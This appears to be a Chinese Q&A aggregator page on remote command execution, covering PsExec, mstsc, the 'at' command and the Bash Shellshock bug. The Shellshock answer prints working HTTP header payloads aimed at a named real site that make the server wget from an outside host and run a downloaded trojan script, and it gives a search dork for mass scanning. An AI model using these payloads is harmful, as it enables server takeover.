导航:首页 > 程序命令 > 远程命令执行

远程命令执行

发布时间:2022-03-01 08:06:53

① 如何用命令执行远程EXE程序

他的B.DLL文件不对!!!

② 如何使用 PsExec 执行远程命令

实用工具(如 Telnet)和远程控制程序(如 Symantec 的 PC Anywhere)使您可以在远程系统上执行程序,但安装它们非常困难,并且需要您在想要访问的远程系统上安装客户端软件。

PsExec 是一个轻型的 telnet 替代工具,它使您无需手动安装客户端软件即可执行其他系统上的进程,并且可以获得与控制台应用程序相当的完全交互性。

PsExec 最强大的功能之一是在远程系统和远程支持工具(如 IpConfig)中启动交互式命令提示窗口,以便显示无法通过其他方式显示的有关远程系统的信息。

psexec是一个远程执行工具,你可以像使用telnet一样使用它。

它的使用格式为:

psexec \\远程机器ip [-u username [-p password]] [-c [-f]] [-i][-d] program [arguments]

它的参数有:
-u 后面跟用户名 -p后面是跟密码的,如果建立ipc连接后这两个参数则不需要。
(如果没有-p参数,则输入命令后会要求你输入密码)

-c <[路径]文件名>:拷贝文件到远程机器并运行(注意:运行结束后文件会自动删除)

-d 不等待程序执行完就返回
(比如要让远程机器运行tftp服务端的时候使用,不然psexec命令会一直等待tftp程序结束才会返回)

-i 在远程机器上运行一个名为psexesvc进程,(到底什么用弄不明白)

假设我在远程机器ip有一个账号,账号名是:abc 密码是:123
比如想要用telnet一样在远程系统上执行命令可以打:(远程系统要开admin$)
psexec \\远程机器ip -u abc -p 123 cmd

如果想要远程机器执行本地c:\srm.exe文件可以打:
psexec \\远程机器ip -u abc -p 123 -c c:\srm.exe

如果想要让远程机器执行本地上tftp服务端,(假设tftp服务端在本地c:\tftp32.exe),可以打:

psexec \\远程机器ip -u abc -p 123 -c c:\tftp32.exe -d

③ 远程控制的命令是什么

计算机
远程控制
的命令是“mstsc”。它的全称为“Microsoft
terminal
services
client”,指创建与
终端服务器
或其他远程计算机的连接,编辑现有“远程桌面连接(.rdp)”配置文件。
mstsc还有一种说法,MicrosoftTelnetScreenControl,即“微软远程桌面控制”。
mstsc的具体用法如下:
1、单击屏幕左下角的“开始”菜单
2、在弹出菜单中单击“运行”,也可以使用
键盘
的WIN+R组合键调出“运行”栏
3、在“运行”栏中输入“mstsc“,然后点击”确定“
4、启动mstsc
5、在“计算机”一栏输入需要远程控制的计算机IP地址,单击“连接”
6、弹出对方计算机的登录画面。输入该计算机的
用户名

密码
,即可登录进行远程操作。

④ 如何将dos命令在远程电脑上执行

  1. 有远程电脑的IP地址,远程电脑不是内网。

  2. 知道电脑的用户名和密码。

  3. 用TELNET登录。

⑤ 如何执行远程计算机的dos命令

是bat参数问题
编写bat时,考虑到参数,调用的时候,加入远程计算机名作为参数
例外,貌似需要远程权限的说,dos可以干坏事的

⑥ 远程控制的运行处命令

mstsc.exe

⑦ 怎样通过CMD命令执行一个远程主机上的exe用哪个命令

At 命令

列出在指定的时间和日期在计算机上运行的已计划命令或计划命令和程序。必须正在运行“计划”服务才能使用 at 命令。

at [\\computername] [[id] [/delete] | /delete [/yes]]

at [\\computername] time [/interactive] [/every:date[,...]| /next:date[,...]] command

参数



如果在没有参数的情况下使用,则 at 列出已计划的命令。

\\computername

指定远程计算机。如果省略该参数,命令将安排在本地计算机。

id

指定指派给已计划命令的识别码。

/delete

取消已计划的命令。如果省略了 id,计算机中已计划的命令将被全部取消。

/yes

当删除已计划的事件时,对系统的查询强制进行肯定的回答。

time

指定运行命令的时间。将时间以 24 小时标记(00:00 [午夜] 到 23:59)的方式表示为小时:分钟。

/interactive

允许作业与在作业运行时登录用户的桌面进行交互。

/every:date[,...]

在每个星期或月的指定日期(例如,每个星期四,或每月的第三天)运行命令。将 date 指定为星期的一天或多天 (M,T,W,Th,F,S,Su),或月的一天或多天(使用 1 到 31 的数字)。用逗号分隔多个日期项。如果省略了 date,将假定为该月的当前日期。

/next:date[,...]

在重复出现下一天(例如,下个星期四)时,运行指定命令将 date 指定为星期的一天或多天 (M,T,W,Th,F,S,Su),或月的一天或多天(使用 1 到 31 的数字)。用逗号分隔多个日期项。如果省略了 date,将假定为该月的当前日期。

command

指定要运行的 Windows 2000 命令、程序(.exe 或 .com 文件)或批处理程序(.bat 或 .cmd 文件)。当命令需要路径作为参数时,请使用绝对路径,也就是从驱动器号开始的整个路径。如果命令在远程计算机上,请指定服务器和共享名的 UNC 符号,而不是远程驱动器号。如果命令不是可执行 (.exe) 文件,必须在命令前加上 cmd /c,例如:

cmd /c dir > c:\test.out

⑧ 远程代码执行漏洞是什么意思

简而言之,就是攻击者可以利用这个漏洞对你上网进行攻击,使你执行一些非预期的指令,甚至得到你的系统控制权。希望可以帮到你。

⑨ bash远程命令执行漏洞 怎么修复

从昨天开始,这个从澳大利亚远渡重洋而来的BASH远程命令执行漏洞就沸腾了整个FreeBuf,大家都在谈论,“互联网的心脏又出血了”,可是,亲,到底怎么对网站进行测试?下面这段脚本
$ env x=‘() { :;}; echo vulnerable' bash -c "echo this is a test"

真的如各路大神们说的这样吗?
它与“心脏出血”漏洞不同,“心脏出血”只能借助窃取用户电脑信息,而bash 漏洞允许黑客远程控制电脑,拿到系统最高权限!其方法利用就更简单了——复制/粘贴一行命令代码即可!

Bash漏洞为什么能够执行

Bash漏洞的原理:
BASH除了可以将shell变量导出为环境变量,还可以将shell函数导出为环境变量!当前版本的bash通过以函数名作为环境变量名,以“(){”开头的字串作为环境变量的值来将函数定义导出为环境变量。
此次爆出的漏洞在于BASH处理这样的“函数环境变量”的时候,并没有以函数结尾“}”为结束,而是一直执行其后的shell命令。

简单地说就是,Bash脚本在解析某些特殊字符串时出现逻辑错误导致可以执行后面的命令。
Bash漏洞与远程执行有啥联系
看到上面的解释,很多童鞋都理解成了本地的漏洞,然后很多人又觉得,本地有啥可以利用的,于是就忽略了这个神级漏洞的存在。我想说的是,这个漏洞,利用热度可以媲美当年的MS08-067,威力虽然弱了点,但远程控制电脑还是可以的。
首先解释一下cgi脚本。很多网站类似下面的链接:
GET http://help.tenpay.com/cgi-bin/helpcenter/help_center.cgi?id=20HTTP/1.1

后台不仅仅用python、Perl来解释执行并反馈给客户端Response,当然还可以换做bash脚本来解释执行提交上来的GET/POST请求。所以,理论上,你在HTTP请求中插入一个Bash命令,比如
() { :;}; wget http://www.myvps.org/testvul.sh

如果服务器的Bash解释器具有这个漏洞,那么在解释上面这这句话的时候就会执行wget请求,将一个恶意的testvul.sh文件下载到这个服务器,那为何说要放在HTTP头部呢?比如:
GET /cgi-bin/helpcenter/help_center.cgi?id=20 HTTP/1.1
Host: help.tenpay.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: */*
Referer: http://www..com
Connection: keep-alive

这是因为这个漏洞是bash解释器在解释某些特殊的变量时才可以触发的:
在于BASH处理以“(){”开头的“函数环境变量”的时候,并没有以函数结尾“}”为结束,而是一直执行其后的shell命令
通过自定义这些参数的值为“函数环境变量”的形式,就可以触发后面的命令,恶意的客户仅需要发送特殊构造的HTTP请求就可以使服务器执行特定的命令(命令的权限和解释HTTP请求的Bash脚本环境相同)。
实际测试中,我的构造的测试请求:
GET /cgi-bin/helpcenter/help_center.cgi?id=20 HTTP/1.1
Host: help.tenpay.com
User-Agent: () { :;}; /usr/bin/wget http://myvps.org/remember_client_ip.php
Accept: */*
Referer: http://www..com
Connection: keep-alive

过程是这样的:
我发送GET请求–>目标服务器cgi路径
目标服务器解析这个get请求,碰到UserAgent后面的参数,Bash解释器就执行了后面的命令
目标服务器wget–>我的myvps.org
我的vps记录下这个访问的IP地址
然后查看我的myvps.org服务器的访问记录,就可以确定目标有没有去访问,如果访问了,那么,很好,它是有漏洞的。下面是我的VPS接收到的wget请求访问的日志:

大神是这样测试漏洞的

当然,你也可以这样构造:
GET /cgi-bin/helpcenter/help_center.cgi?id=20 HTTP/1.1
Host: help.tenpay.com
User-Agent: () { :;}; /usr/bin/wget -O /tmp/muma.sh ;chmod 777 /tmp/muma.sh; ./tmp/muma.sh
Accept: */*
Referer: http://www..com
Connection: keep-alive

实际上执行了下面三句:
/usr/bin/wget -O /tmp/muma.sh http://myvps.org/muma.sh ;
chmod 777 /tmp/muma.sh;
./tmp/muma.sh

你会发现,脚本就执行了,这就是Bash漏洞利用测试的精髓。
当然,你可以利用批量Google搜索:
filetype:cgi inurl:cgi-bin site:jp
然后批量提交类似的GET请求,你就能做到批量测试了。测试表明,500个url里有6-8个有bash漏洞

阅读全文

与远程命令执行相关的资料

热点内容
犯过罪还能当程序员吗 浏览:975
参数名称java 浏览:11
android序列化文件 浏览:249
java泛型for 浏览:29
html保存pdf 浏览:211
单片机毕业论文摘要 浏览:666
安卓机如何关闭闪付 浏览:518
pdf标注app 浏览:484
编译原理的前端和后端的意义 浏览:395
德阳程序员招聘 浏览:801
javaascii转中文 浏览:889
酷狗app在哪里点自己唱 浏览:202
ios15轻量版app怎么删除 浏览:564
dos下载命令行 浏览:748
苹果文件加密后打不开 浏览:279
单片机握手失败 浏览:394
中国联通app怎么查每月实时话费 浏览:463
linuxatlas 浏览:483
webcamandroid 浏览:71
友友车友软件免加密 浏览:98